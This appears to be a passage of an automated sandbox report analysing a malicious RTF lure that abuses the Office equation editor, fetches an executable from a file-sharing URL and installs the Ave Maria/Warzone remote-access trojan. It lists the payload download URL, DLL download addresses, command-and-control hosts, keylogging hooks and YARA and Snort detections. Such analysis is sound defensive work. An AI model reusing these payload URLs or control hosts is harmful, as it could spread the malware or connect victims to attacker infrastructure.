          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80

          Networking

          barindex
          Source: TrafficSnort IDS: 2852326 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: TrafficSnort IDS: 2036735 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: TrafficSnort IDS: 2852327 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: TrafficSnort IDS: 2036734 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: TrafficSnort IDS: 2852329 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: TrafficSnort IDS: 2852328 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: unknownDNS query: name: value747.duckdns.org
          Source: Malware configuration extractorURLs: value747.duckdns.org
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /get/mGCQGV/gstallabt4.2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: transfer.sh
          Source: global trafficHTTP traffic detected: GET /get/mGCQGV/gstallabt4.2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: transfer.shConnection: Keep-Alive
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040264B URLDownloadToFileW,ShellExecuteW,7_2_0040264B
          Source: Joe Sandbox ViewASN Name: EENET-ASEE EENET-ASEE
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040A50C GetCurrentDirectoryW,InternetCheckConnectionW,GetTempPathW,GetTempPathW,lstrcatW,lstrcatW,GetTempPathW,lstrcatW,GetTempPathW,lstrcatW,GetTempPathW,lstrcatW,GetTempPathW,lstrcatW,GetTempPathW,lstrcatW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,SetCurrentDirectoryW,PathFileExistsW,PathFileExistsW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,SetCurrentDirectoryW,7_2_0040A50C
          Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
          Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: efwhixxln.exeString found in binary or memory: http://5.206.225.104/dll/freebl3.dll
          Source: efwhixxln.exeString found in binary or memory: http://5.206.225.104/dll/mozglue.dll
          Source: efwhixxln.exeString found in binary or memory: http://5.206.225.104/dll/msvcp140.dll
          Source: efwhixxln.exeString found in binary or memory: http://5.206.225.104/dll/nss3.dll
          Source: efwhixxln.exeString found in binary or memory: http://5.206.225.104/dll/softokn3.dll
          Source: efwhixxln.exeString found in binary or memory: http://5.206.225.104/dll/vcruntime140.dll
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: word.exe, 00000005.00000000.913542104.000000000040A000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmp, gstallabt4.2[1].exe.2.dr, word.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.916177028.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transfer.sh/get/mGCQGV/gstallabt4.2.exe
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transfer.sh/get/mGCQGV/gstallabt4.2.exej
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: efwhixxln.exeString found in binary or memory: http://www.google.com
          Source: efwhixxln.exe, 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923616743.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923531390.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923479705.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp:
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/2.exe
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/mGCQ
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/mGCQGV/gstallabt4.2.exe
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/mGCQGV/gstallabt4.2.exeC:
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A105EE94-C031-489E-93FD-76B738B38261}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: transfer.sh
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_004050CC setsockopt,recv,7_2_004050CC
          Source: global trafficHTTP traffic detected: GET /get/mGCQGV/gstallabt4.2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: transfer.sh
          Source: global trafficHTTP traffic detected: GET /get/mGCQGV/gstallabt4.2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: transfer.shConnection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
          Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.916177028.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49174 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\efwhixxln.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00407376 SetWindowsHookExA 0000000D,004074C0,00000000,000000007_2_00407376
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_004074D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,7_2_004074D5
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00405809
          Source: efwhixxln.exe, 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputData

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f4be0.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923531390.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923616743.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923479705.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 2672, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 1792, type: MEMORYSTR

          System Summary

          barindex
          Source: RFQ-BT5004423.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 7.3.efwhixxln.exe.5fb358.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 7.3.efwhixxln.exe.5fb358.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 7.3.efwhixxln.exe.5f4be0.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 6.2.efwhixxln.exe.324a70.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 7.2.efwhixxln.exe.418070.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
          Source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\gstallabt4.2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00406D5F5_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_00230F9C6_2_00230F9C
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_002312726_2_00231272
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040F2C77_2_0040F2C7
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: RFQ-BT5004423.doc, type: SAMPLEMatched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
          Source: RFQ-BT5004423.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
